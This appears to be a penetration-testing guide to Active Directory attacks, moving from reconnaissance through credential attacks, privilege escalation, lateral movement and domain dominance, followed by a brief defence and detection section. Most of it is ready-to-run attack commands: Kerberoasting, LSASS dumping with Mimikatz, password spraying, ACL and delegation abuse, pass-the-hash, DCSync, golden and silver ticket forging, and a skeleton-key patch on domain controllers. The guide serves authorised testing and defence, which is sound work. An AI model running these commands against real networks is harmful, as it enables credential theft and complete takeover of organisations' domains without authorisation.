Active Directory Attack Paths: From User to Domain Admin

Active Directory remains the backbone of enterprise identity management, deployed in over 90% of Fortune 1000 companies. It's also the most common path to total domain compromise in penetration tests. The combination of legacy protocols, complex trust relationships, and accumulated misconfigurations creates attack paths that lead from a single compromised user account to complete domain dominance.

This guide walks through the methodology we use during internal penetration tests and red team engagements. We'll cover reconnaissance, credential attacks, privilege escalation, lateral movement, and persistence—with practical examples using common offensive tools.

Phase 1: Reconnaissance

With valid domain credentials (even low-privileged), you can query Active Directory for a wealth of information. This is by design—AD is built on the assumption that authenticated users need to discover resources.

Domain Enumeration with BloodHound

BloodHound revolutionized AD penetration testing by visualizing attack paths. It collects AD data and uses graph theory to identify paths to high-value targets:

# Using SharpHound collector
.\SharpHound.exe -c All

# Or the Python version (from Linux)
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.1 -c All

# Import the JSON files into BloodHound and run queries:
# - Shortest path to Domain Admins
# - Find principals with DCSync rights
# - Find computers where Domain Users are local admin

Manual Enumeration with PowerView

# Import PowerView
Import-Module .\PowerView.ps1

# Get domain information
Get-Domain
Get-DomainController

# Enumerate users
Get-DomainUser | Select-Object samaccountname, description, memberof
Get-DomainUser -SPN  # Users with SPNs (Kerberoastable)
Get-DomainUser -PreAuthNotRequired  # AS-REP Roastable users

# Enumerate groups
Get-DomainGroup -Identity "Domain Admins" -Recurse
Get-DomainGroupMember -Identity "Domain Admins"

# Find computers
Get-DomainComputer | Select-Object dnshostname, operatingsystem

# Find shares
Find-DomainShare -CheckShareAccess

# Find interesting ACLs
Find-InterestingDomainAcl -ResolveGUIDs

What to Look For

• Service accounts: Often have weak passwords and elevated privileges
• Users with SPNs: Kerberoasting targets
• Users without pre-auth: AS-REP Roasting targets
• Stale accounts: Old accounts may have weak passwords
• Description fields: Admins sometimes put passwords in descriptions
• Group memberships: Nested groups can hide privilege paths
• GPO permissions: Who can modify Group Policy?
• ACL misconfigurations: Who can reset passwords, add to groups?

Phase 2: Credential Attacks

Kerberoasting

Kerberoasting exploits how Kerberos works with service accounts. When a user requests a service ticket (TGS), the ticket is encrypted with the service account's password hash. Since any authenticated user can request tickets for any service, an attacker can request tickets offline and crack them.

# Find Kerberoastable accounts
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname

# Request tickets (PowerView)
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File hashes.txt

# Or using Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

# From Linux with impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1 -request

# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule

AS-REP Roasting

Users with "Do not require Kerberos preauthentication" enabled can have their AS-REP encrypted blob captured without authentication. This blob is encrypted with the user's hash and can be cracked offline.

# Find vulnerable users
Get-DomainUser -PreAuthNotRequired

# Using Rubeus
.\Rubeus.exe asreproast /outfile:asrep.txt

# From Linux
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.1 -format hashcat

# Crack with hashcat
hashcat -m 18200 asrep.txt wordlist.txt

LLMNR/NBT-NS Poisoning

When Windows can't resolve a hostname via DNS, it falls back to LLMNR and NBT-NS—broadcast protocols that anyone on the network can respond to. By responding to these requests, attackers capture NTLMv2 hashes.

# Using Responder
sudo responder -I eth0 -dwPv

# Captured hashes appear in Responder's logs
# Crack with hashcat
hashcat -m 5600 ntlmv2_hashes.txt wordlist.txt

Password Spraying

Rather than guessing many passwords for one account (triggering lockouts), spray one password across many accounts:

# Using CrackMapExec
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Summer2026!' --continue-on-success

# Using Spray (kerbrute)
.\kerbrute.exe passwordspray -d domain.local users.txt 'Summer2026!'

# Common passwords to try:
# SeasonYear! (Summer2026!, Winter2025!)
# CompanyName123!
# Welcome1!

Dumping Credentials from Memory

With local admin access on a system, dump credentials from LSASS memory:

# Using Mimikatz
privilege::debug
sekurlsa::logonpasswords

# Dump from minidump file (evasion)
# First, create minidump
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\temp\lsass.dmp full
# Then extract offline
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

# Using CrackMapExec
crackmapexec smb 10.10.10.100 -u admin -p password --lsa
crackmapexec smb 10.10.10.100 -u admin -p password -M lsassy

Phase 3: Privilege Escalation

ACL Abuse

Active Directory permissions (ACLs) control who can do what. Misconfigurations grant unintended privileges:

GenericAll on User

# If you have GenericAll on a user, you can reset their password
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force)

# Or set SPN and Kerberoast them
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}
Invoke-Kerberoast -Identity targetuser

GenericWrite on User

# Add SPN for Kerberoasting
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}

# Or modify scripts/logon paths for code execution

WriteDACL

# Grant yourself more permissions
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity attacker -Rights All

AddMember on Group

# Add yourself to privileged group
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker

Delegation Attacks

Kerberos delegation allows services to impersonate users. Misconfigurations enable powerful attacks:

Unconstrained Delegation

Computers with unconstrained delegation store TGTs of connecting users. Compromise such a computer, and you can impersonate any user who connects:

# Find unconstrained delegation computers
Get-DomainComputer -Unconstrained

# Monitor for incoming TGTs using Rubeus
.\Rubeus.exe monitor /interval:5

# Coerce authentication from DC using PrinterBug
SpoolSample.exe DC01.domain.local AttackerMachine.domain.local

# Captured TGT can be used for DCSync

Constrained Delegation

With a compromised account that has constrained delegation, forge tickets to allowed services:

# Find constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Using Rubeus to request ticket impersonating admin
.\Rubeus.exe s4u /user:service_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt

Resource-Based Constrained Delegation (RBCD)

If you can write to msDS-AllowedToActOnBehalfOfOtherIdentity on a computer, you can configure RBCD to impersonate users to that computer:

# You need a computer account (or user with SPN)
# Create machine account if needed
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force)

# Configure RBCD
$ComputerSid = Get-DomainComputer FAKE01 -Properties objectsid | Select-Object -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# Get ticket
.\Rubeus.exe s4u /user:FAKE01$ /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/TargetComputer.domain.local /ptt

Phase 4: Lateral Movement

Pass-the-Hash

NTLM hashes can authenticate without knowing the plaintext password:

# Using CrackMapExec
crackmapexec smb 10.10.10.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:hash

# Using impacket
psexec.py domain/administrator@10.10.10.100 -hashes :hash
wmiexec.py domain/administrator@10.10.10.100 -hashes :hash
smbexec.py domain/administrator@10.10.10.100 -hashes :hash

# Using Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:powershell.exe

Pass-the-Ticket

Kerberos tickets can be extracted and reused:

# Export tickets with Mimikatz
sekurlsa::tickets /export

# Or with Rubeus
.\Rubeus.exe dump

# Import ticket
.\Rubeus.exe ptt /ticket:base64_ticket

# Using Mimikatz
kerberos::ptt ticket.kirbi

Overpass-the-Hash

Convert NTLM hash to Kerberos ticket:

# Using Rubeus
.\Rubeus.exe asktgt /user:administrator /rc4:hash /ptt

# Using Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:powershell.exe
# New process will have Kerberos ticket

Remote Execution Methods

# PSExec (creates service)
psexec.py domain/admin:password@target

# WMI (uses DCOM)
wmiexec.py domain/admin:password@target

# WinRM
evil-winrm -i target -u admin -p password

# SMB exec (creates service, deletes immediately)
smbexec.py domain/admin:password@target

# DCOM
dcomexec.py domain/admin:password@target

Phase 5: Domain Dominance

DCSync Attack

With Replicating Directory Changes permissions (Domain Admins have this by default), request password data directly from the DC as if you were another domain controller:

# Using Mimikatz
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /all /csv

# Using impacket
secretsdump.py domain/admin:password@dc01.domain.local

# Using CrackMapExec
crackmapexec smb dc01.domain.local -u admin -p password --ntds

The krbtgt hash is the keys to the kingdom—it's used to sign all Kerberos tickets.

Golden Ticket

With the krbtgt hash, forge tickets for any user, including non-existent users with any group membership:

# Create Golden Ticket with Mimikatz
kerberos::golden /user:fakeadmin /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt

# Using impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain domain.local fakeadmin
export KRB5CCNAME=fakeadmin.ccache
psexec.py domain.local/fakeadmin@dc01 -k -no-pass

Silver Ticket

With a service account's hash, forge tickets to that specific service:

# Create Silver Ticket for CIFS (file shares)
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt

# Silver Tickets are useful for:
# - CIFS: File share access
# - HTTP: Web service access
# - LDAP: Directory queries
# - HOST: PsExec-like access

Skeleton Key

Patch LSASS on domain controllers to accept a master password for any account:

# Using Mimikatz on DC
privilege::debug
misc::skeleton

# Now "mimikatz" works as password for any account
# Original passwords still work too

Defense and Detection

Understanding these attacks informs defensive strategy:

Credential Protection

• Enable Credential Guard on Windows 10+ to protect LSASS
• Use Protected Users security group for privileged accounts
• Implement LAPS (Local Administrator Password Solution)
• Disable NTLM where possible, enforce NTLMv2 minimum
• Set strong passwords for service accounts, use gMSA where possible

Kerberos Hardening

• Require pre-authentication for all accounts
• Use AES encryption for service accounts
• Implement Privileged Access Workstations (PAWs)
• Enable "Account is sensitive and cannot be delegated" for privileged accounts
• Audit and restrict delegation settings

Detection Opportunities

• Kerberoasting: High volume TGS requests for unique SPNs
• AS-REP Roasting: AS-REQ without pre-auth for multiple accounts
• DCSync: Replication requests from non-DC systems
• Golden Ticket: TGS without corresponding AS-REQ
• Pass-the-Hash: NTLM authentication with event 4624 type 9
• Password Spray: Multiple failed logins across accounts from single source

Recommended Tools for Defenders

• BloodHound: Map attack paths from defender perspective
• PingCastle: AD security assessment
• Purple Knight: AD security posture scoring
• ADRecon: AD reconnaissance for defenders

Conclusion

Active Directory's complexity is both its strength and weakness. The same flexibility that allows it to support diverse enterprise needs creates attack paths that lead from any user account to domain dominance. Kerberos delegation, ACL inheritance, group nesting, and legacy protocol support combine to create environments where privilege escalation is often just a matter of finding the right path.

For penetration testers, mastering these techniques is essential—AD compromise remains the most common objective in enterprise engagements. For defenders, understanding the attacker's playbook enables targeted hardening and detection.

The key principle: assume breach. Design AD with the assumption that attackers will gain initial access. Limit lateral movement paths, protect credentials, detect abuse, and segment privileged access. A single compromised workstation shouldn't be a guaranteed path to Domain Admin.